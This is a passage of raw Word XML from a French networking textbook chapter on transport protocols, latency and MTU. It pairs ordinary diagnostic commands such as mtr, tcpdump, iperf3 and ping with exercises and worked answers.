        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.63 — Deux équipements, deux rôles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois tables et deux outils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Table de routage</w:t>
        <w:br/>
        <w:t>ip route</w:t>
        <w:br/>
        <w:t># default via 192.168.1.1 dev eth0 proto dhcp metric 100</w:t>
        <w:br/>
        <w:t># 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.20</w:t>
        <w:br/>
        <w:br/>
        <w:t># Table ARP : correspondance IP ↔ MAC</w:t>
        <w:br/>
        <w:t>ip neigh</w:t>
        <w:br/>
        <w:br/>
        <w:t># Suivre le chemin</w:t>
        <w:br/>
        <w:t>traceroute -n exemple.fr</w:t>
        <w:br/>
        <w:t>mtr --report exemple.fr</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MTU</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Taille maximale d'une unité de transmission. Sur Ethernet, 1500 octets en général. Un paquet plus gros est fragmenté ou rejeté, ce qui provoque des symptômes déroutants : petites requêtes réussies, grosses requêtes bloquées.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>54.4 TCP, UDP et QUIC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le transport décide de la fiabilité et de l'ordre. TCP garantit la livraison et la séquence ; UDP non ; QUIC ajoute la fiabilité au-dessus d'UDP avec moins de latence d'établissement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.188 — Trois protocoles de transport</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193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Protocole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="206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Fiabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="167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Ordre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1932"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>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1674"/>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3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP/1.1, SSH, bases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="193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UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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167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334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DNS, VoIP, jeux, QUIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1932"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>QUIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2060"/>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1674"/>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3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTP/3, multiplexage sans blocage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois étapes, quatre fermetures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Établissement TCP : trois messages</w:t>
        <w:br/>
        <w:t># 1. SYN         client → serveur</w:t>
        <w:br/>
        <w:t># 2. SYN-ACK     serveur → client</w:t>
        <w:br/>
        <w:t># 3. ACK         client → serveur</w:t>
        <w:br/>
        <w:t># Puis les données circulent.</w:t>
        <w:br/>
        <w:br/>
        <w:t># Fermeture : quatre messages (FIN, ACK, FIN, ACK)</w:t>
        <w:br/>
        <w:br/>
        <w:t># Observer les états des connexions</w:t>
        <w:br/>
        <w:t>ss -tan state established</w:t>
        <w:br/>
        <w:t>ss -s</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HANDSHAKE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Négociation initiale entre deux pairs. Pour TLS au-dessus de TCP, elle ajoute deux allers-retours, ce qui motive la reprise de session et QUIC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux captures, une analyse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Capture de trafic (à utiliser avec discernement)</w:t>
        <w:br/>
        <w:t>tcpdump -i eth0 -n port 443 -c 20</w:t>
        <w:br/>
        <w:t>tcpdump -i any -nn -A port 53</w:t>
        <w:br/>
        <w:br/>
        <w:t># Analyse détaillée</w:t>
        <w:br/>
        <w:t>tshark -i eth0 -f "tcp port 443"</w:t>
        <w:br/>
        <w:t># Wireshark offre la même analyse en interface graphique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>54.5 Latence, débit et perte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois grandeurs décrivent une liaison. Le débit n'est pas la latence : une liaison très rapide peut être inutilisable pour une application interactive si l'aller-retour est long.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.189 — Quatre grandeurs réseau</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25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Grandeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Mesure</w:t>
            </w:r>
          </w:p>
        </w:tc>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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Latence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3756"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aller-retour en ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mtr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Débit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Octets par seconde</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iperf3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>curl -w</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2254"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Perte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3756"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pourcentage de paquets perdus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mtr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="225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Gigue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="375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Variation de la latence</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mtr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, mesures répétées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux mesures reproductibles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Mesure de débit entre deux machines</w:t>
        <w:br/>
        <w:t># Sur le serveur</w:t>
        <w:br/>
        <w:t>iperf3 -s</w:t>
        <w:br/>
        <w:t># Sur le client</w:t>
        <w:br/>
        <w:t>iperf3 -c serveur.exemple.fr -t 10 -P 4</w:t>
        <w:br/>
        <w:br/>
        <w:t># Temps détaillé d'une requête HTTP</w:t>
        <w:br/>
        <w:t>curl -o /dev/null -s -w \</w:t>
        <w:br/>
        <w:t>"dns %{time_namelookup} | connexion %{time_connect} | tls %{time_appconnect} |</w:t>
        <w:br/>
        <w:t xml:space="preserve">    total %{time_total}\n" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  https://exemple.fr</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DIAGNOSTIC RÉSEAU EN CINQ COMMANDES</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ip addr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ip route</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : la configuration locale.</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ping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> la passerelle, puis une adresse publique.</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dig</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : la résolution de noms.</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nc -zv hote port</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : l'accessibilité du port.</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curl -v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : le comportement applicatif.</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OSI est un modèle pédagogique ; TCP/IP décrit l'implémentation.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L'encapsulation ajoute un en-tête par couche.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diagnostic progresse du bas vers le haut de la pile.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commutateur relie un réseau local, le routeur relie des réseaux.</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MTU explique les échecs sur gros paquets uniquement.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TCP garantit la livraison, UDP non, QUIC ajoute la fiabilité.</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Latence et débit sont deux mesures distinctes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les couches sont posées. Le chapitre suivant entre dans l'adressage : IP, masques et routage.</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54.1 — Diagnostiquer une panne</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 xml:space="preserve">Un serveur ne répond plus en HTTPS, mais </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fonctionne.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Vérifiez la configuration locale.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Testez le port.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Observez le service.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 54.2 — Suivre un paquet</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Une requête traverse trois routeurs avant d'atteindre sa destination.</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Observez les sauts.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Identifiez les latences anormales.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Distinguez perte locale et perte distante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 54.3 — Tester une MTU</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Les petites requêtes passent, les gros transferts bloquent.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Testez avec DF (don't fragment).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Diminuez la taille jusqu'au succès.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Corrigez la MTU.</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54.1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ip addr show</w:t>
        <w:br/>
        <w:t>ip route</w:t>
        <w:br/>
        <w:t>ping -c 2 192.168.1.1</w:t>
        <w:br/>
        <w:t>nc -zv exemple.fr 443</w:t>
        <w:br/>
        <w:t>ss -ltnp | grep :443</w:t>
        <w:br/>
        <w:t>curl -vk https://exemple.fr 2&gt;&amp;1 | head -20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> qui fonctionne et HTTPS qui échoue oriente vers le port, le service ou TLS — pas vers le réseau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl -v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> affiche chaque étape : résolution, connexion, négociation TLS, réponse HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 54.2</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mtr --report --report-cycles 10 exemple.fr</w:t>
        <w:br/>
        <w:t># Loss%  Snt  Last  Avg  Best  Wrst  StDev  Host</w:t>
        <w:br/>
        <w:t>#  0.0%   10   1.1  1.2   1.0   1.6   0.2   192.168.1.1</w:t>
        <w:br/>
        <w:t>#  0.0%   10   8.4  9.1   8.0  11.2   0.9   10.0.0.1</w:t>
        <w:br/>
        <w:t># 33.0%   10  42.0 43.7  41.2  48.9   2.1   transit.exemple</w:t>
        <w:br/>
        <w:t>#  0.0%   10  41.8 42.9  41.5  47.0   1.8   cible.exemple</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une perte qui apparaît à un saut puis disparaît au suivant correspond souvent à une limitation de débit des réponses ICMP, pas à une vraie perte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une perte qui persiste jusqu'à la destination est réelle et affecte les applications sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 54.3</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Tester sans fragmentation</w:t>
        <w:br/>
        <w:t>ping -M do -s 1472 -c 2 exemple.fr   # 1472 + 28 = 1500</w:t>
        <w:br/>
        <w:t>ping -M do -s 1400 -c 2 exemple.fr</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ajuster la MTU de l'interface (persistant via NetworkManager)</w:t>
        <w:br/>
        <w:t>ip link set dev eth0 mtu 1400</w:t>
        <w:br/>
        <w:t>nmcli connection modify eth0 802-3-ethernet.mtu 1400</w:t>
        <w:br/>
        <w:t>nmcli connection up eth0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La valeur testée exclut les en-têtes IP et ICMP : 1472 + 28 = 1500.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
